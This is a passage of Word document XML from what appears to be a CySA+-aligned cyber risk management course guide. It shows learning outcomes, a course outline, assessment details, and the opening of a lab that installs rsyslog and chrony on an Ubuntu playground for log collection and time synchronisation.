        <w:t>Most labs run in the free Killercoda Ubuntu Playground (https://killercoda.com/playgrounds/scenario/ubuntu) — no local install required. A few use free web tools or free virtual appliances (noted per lab). Work through the labs in order; each builds on the skills of the one before it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Learning Outcomes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>By the end of this course, learners will be able to:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Identify cyber security risks, threats, and vulnerabilities, and assess their impact on the organization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Develop cyber risk assessments by consolidating insights from business to identify security gaps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Identify possible treatments for identified cyber risks, threats, and vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Implement endorsed treatment measures to address security gaps and ensure data protection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Skills Framework Alignment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>TSC Title: Cyber Risk Management   |   TSC Code: ICT-SNA-4007-1.1</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4824"/>
        <w:gridCol w:w="4824"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Knowledge (K)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Abilities (A)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>K1 Cyber risk assessment techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>A1 Develop cyber risk assessment techniques to identify security loopholes and weaknesses in the business</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>K2 Security risks, threats and vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>A2 Design cyber risk assessments by consolidating insights from the business and various functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>K3 Possible treatments of security risks, threats and vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>A3 Identify cyber security risks, threats and vulnerabilities, and their impact on the organisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>K4 Required levels of confidentiality, integrity, privacy and personal data protection as well as privacy technologies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>A4 Identify possible treatments for cyber risks, threats and vulnerabilities identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="19"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4608"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>A5 Implement endorsed treatment and measures to address security gaps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Course Outline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Topic 1: Security Operations (33%)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>OS &amp; software security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Logging &amp; log ingestion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Network architecture &amp; segmentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Identity &amp; access management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Encryption &amp; active defence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Indicators of malicious activity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Packet &amp; traffic analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Email analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Threat intelligence &amp; MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Topic 2: Vulnerability Management (30%)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Asset discovery &amp; network mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vulnerability scanning (OpenVAS/ZAP/Nikto)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Analysing scan results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CVSS scoring &amp; prioritisation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Web application vulnerabilities (XSS/SQLi)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Exploitation with Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Patch management &amp; hardening</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Attack surface reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Topic 3: Incident Response and Management (20%)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Attack frameworks (Kill Chain, ATT&amp;CK, Diamond)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Evidence acquisition &amp; chain of custody</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Memory &amp; host forensics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Log analysis for IR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Containment &amp; isolation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IR playbooks &amp; tabletop exercises</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Topic 4: Reporting and Communication (17%)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vulnerability management reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Executive incident reporting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Security metrics (MTTD/MTTR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Compliance reporting (PCI DSS / ISO 27001 / NIST)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Stakeholder communication &amp; lessons learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Written Assessment (SAQ) — 1 hour</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Case Study (CS) — 1 hour</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Format: Open Book (Slides, Learner Guide or approved materials only)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Competency: minimum 75% attendance and assessed as 'Competent'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>How to Use the Hands-On Labs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Open the Killercoda playground: https://killercoda.com/playgrounds/scenario/ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Follow each step in order; type the commands exactly as shown in the shaded code blocks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Reset the playground between labs that change firewall rules or install heavy services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Web-based and local-appliance labs are flagged in each lab's environment note.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Topic 1: Security Operations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="5B6372"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CompTIA CySA+ CS0-003 exam weighting: 33%. Hands-on Labs 1–10.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 1 — Log Ingestion and Time Synchronization</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configure a centralised syslog collector with rsyslog and synchronise the system clock with chrony.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will configure a centralised syslog collector with rsyslog and synchronise the system clock with chrony. Accurate timestamps and reliable log ingestion are the foundation of every SOC: if logs from two hosts disagree on time by 30 seconds, you cannot correlate an attack across them. By the end you will understand log levels, log forwarding, and how time drift is detected and corrected (CySA+ 1.1 — Log ingestion, Time synchronization, Logging levels).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run all commands on the Killercoda Ubuntu Playground: https://killercoda.com/playgrounds/scenario/ubuntu</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Ubuntu Playground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4937760" cy="2097599"/>
            <wp:docPr id="3" name="Picture 3"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="img_48ab3be242.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4937760" cy="2097599"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Install rsyslog and chrony</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt update &amp;&amp; apt install -y rsyslog chrony</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>systemctl enable --now rsyslog chrony</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>rsyslog is the default Linux syslog daemon. chrony is the modern NTP client; it converges faster than ntpd and tolerates jittery virtual machines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Verify time synchronization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
